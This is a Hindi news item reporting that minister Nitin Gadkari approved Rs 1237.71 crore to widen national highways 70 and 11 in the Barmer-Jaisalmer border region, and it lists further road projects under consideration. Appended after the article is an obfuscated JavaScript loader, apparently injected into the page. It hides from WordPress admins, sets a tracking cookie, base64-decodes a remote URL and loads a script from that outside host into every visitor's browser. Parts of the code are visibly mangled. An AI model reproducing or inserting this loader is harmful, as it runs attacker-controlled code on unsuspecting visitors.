सीमांत संसदीय क्षेत्र बाड़मेर और जैसलमेर के नागरिकों की प्रमुख मांगों पर त्वरित कार्यवाही करते हुए केंद्रीय सड़क, परिवहन एवं राजमार्ग मंत्री श्री नितिन गडकरी ने राष्ट्रीय राजमार्ग-70 और राष्ट्रीय राजमार्ग-11 के चौड़ीकरण एवं मजबूतीकरण के लिए ₹1237.71 करोड़ की स्वीकृति प्रदान की। यह स्वीकृति म्यांजलार-जैसलमेर और मुनाबाव-तनोट के सुंदरा-म्यांजलर-अंबासिंह की ढाणी सड़क को पक्की सड़क के साथ दो लेन के रूप में विस्तारित करने के लिए दी गई है।
इस परियोजना से क्षेत्रीय परिवहन नेटवर्क को मजबूती मिलेगी और राष्ट्रीय राजमार्ग-25 तथा राष्ट्रीय राजमार्ग-68 से बेहतर कनेक्टिविटी स्थापित होगी। साथ ही, सीमावर्ती क्षेत्रों में तैनात सुरक्षा बलों को आवागमन में आसानी होगी, जिससे राष्ट्रीय सुरक्षा को भी बल मिलेगा। इस स्वीकृति से क्षेत्र के नागरिकों, व्यापारियों और यात्रियों को भी सुगम यातायात की सुविधा उपलब्ध होगी और समग्र विकास को गति मिलेगी।
इसके अलावा, संसदीय क्षेत्र में अन्य प्रमुख सड़क परियोजनाओं को भी शीघ्र स्वीकृति दिलाने के लिए प्रयास जारी हैं। इनमें राष्ट्रीय राजमार्ग-25 के जोधपुर-पचपदरा-बायतू-बाड़मेर खंड को फोरलेन में विकसित करने, बालोतरा बाईपास रोड निर्माण, स्टेट हाइवे-40 को राष्ट्रीय राजमार्ग घोषित करने और बाड़मेर शहर में रिंग रोड विस्तार की योजनाएँ शामिल हैं।
सीमांत थारवासियों को इस स्वीकृति की सौगात देने के लिए माननीय मंत्री श्री नितिन गडकरी का हार्दिक आभार व्यक्त किया गया है। उम्मीद की जा रही है कि शीघ्र ही अन्य सड़क परियोजनाओं की DPR और वित्तीय स्वीकृति भी जारी होगी, जिससे क्षेत्र का चहुंमुखी विकास सुनिश्चित होगा।
(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();
